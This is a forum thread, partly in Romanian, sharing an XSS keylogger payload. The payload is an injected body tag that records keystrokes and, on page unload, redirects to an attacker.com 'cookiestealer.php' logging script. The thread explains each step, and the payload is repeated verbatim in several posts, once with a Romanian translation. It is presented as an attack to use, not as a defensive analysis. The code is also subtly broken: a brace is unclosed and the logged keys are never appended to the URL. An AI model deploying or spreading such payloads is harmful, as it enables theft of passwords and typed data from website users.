Screech Posted August 14, 2006 Report Posted August 14, 2006 XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how.First, I will give you the code to inject, then I will explain it step by step.<body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged.When the page loads, it initializes the variable "key".When a key is pressed, it finds whether the browser uses event.which (netscape-compatible) or event.keyCode (IE compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key".When the page is unloaded (that is, the browser window is closed or a new page is loaded, it sends the browser to a new location, namely your logging program. Quote
Screech Posted August 14, 2006 Author Report Posted August 14, 2006 L-am tradus:Mai intai, o sa va dau codul ptr. injectie, dupa care va voi explica pas cu pas cum merge treaba.<body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie="> Este un tag body, asa ca orice este pus in body, in primul rand orice dupa pagina, va fi logat.Cand pagina o sa fie incarcata, va initializa variabila "key".(cheia variabila)Cand o keye va fi apasata, poti afla cand browserul foloseste evenimentul. .care (netscape-compatible) sau evenimentul.keyCode (IE compatible) si va converti valorile ASCII de la keya apasata la carecterul sau , atunci se va adauga la sfarsitul variabilei key.Cand pagina nu este incarcata (asta este, fereastra browser-ul este inchisa sau o noua pagina este in proces de incaracare, trimite browser-ul intr-o alta locatie, namely your logging program. Quote
tzeus Posted April 1, 2007 Report Posted April 1, 2007 Pai bine...dar codul? Chiar ma interesa treaba asta Quote
hfhun Posted April 5, 2007 Report Posted April 5, 2007 Asta este tutorialul complet:XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how.First, I will give you the code to inject, then I will explain it step by step.<body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged.When the page loads, it initializes the variable "key".When a key is pressed, it finds whether the browser uses event.which (netscape-compatible) or event.keyCode (IE compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key".When the page is unloaded (that is, the browser window is closed or a new page is loaded, it sends the browser to a new location, namely your logging program. Quote
